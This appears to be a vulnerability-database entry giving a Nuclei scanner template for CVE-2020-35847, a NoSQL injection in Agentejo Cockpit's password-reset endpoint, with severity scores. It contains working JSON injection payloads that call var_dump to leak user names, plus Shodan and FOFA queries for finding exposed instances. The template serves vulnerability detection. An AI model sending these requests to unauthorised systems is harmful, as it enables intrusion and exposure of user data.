Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-35847
HistoryApr 13, 2021 - 7:19 p.m.

Agentejo Cockpit <0.11.2 - NoSQL Injection

2021-04-1319:19:41
ProjectDiscovery
github.com
11
agentejo
cockpit
vulnerability
nostruc injection
unauthorized access
data manipulation
denial of service
upgrade
cve-2020-35847

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.836

Percentile

98.5%

Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
id: CVE-2020-35847

info:
  name: Agentejo Cockpit <0.11.2 - NoSQL Injection
  author: dwisiswant0
  severity: critical
  description: |
    Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, potentially leading to unauthorized access, data manipulation, or denial of service.
  remediation: |
    Upgrade Agentejo Cockpit to version 0.11.2 or later to mitigate this vulnerability.
  reference:
    - https://swarm.ptsecurity.com/rce-cockpit-cms/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35847
    - https://getcockpit.com/
    - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
    - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35847
    cwe-id: CWE-89
    epss-score: 0.79056
    epss-percentile: 0.98269
    cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: agentejo
    product: cockpit
    shodan-query:
      - http.favicon.hash:688609340
      - http.html:"cockpit"
    fofa-query:
      - icon_hash=688609340
      - body="cockpit"
  tags: cve,cve2020,nosqli,sqli,cockpit,injection,agentejo

http:
  - raw:
      - |
        POST /auth/requestreset HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "user": {
            "$func": "var_dump"
          }
        }
      - |
        POST /auth/requestreset HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "user": {
            "$func": "nonexistent_function"
          }
        }

    matchers-condition: and
    matchers:
      - type: regex
        part: body_1
        regex:
          - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'

      - type: regex
        part: body_1
        negative: true
        regex:
          - 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"'

      - type: regex
        part: body_2
        negative: true
        regex:
          - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"'
# digest: 4a0a00473045022100db36ce0fbd97ea0543d0552578a92d9d8cfd0ba6831e29a1f4ad697c486a9a2e02205e6c39cb9e2bbdf6aafea87205d507638193823ca347ff08589342efdd3d0b4d:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.836

Percentile

98.5%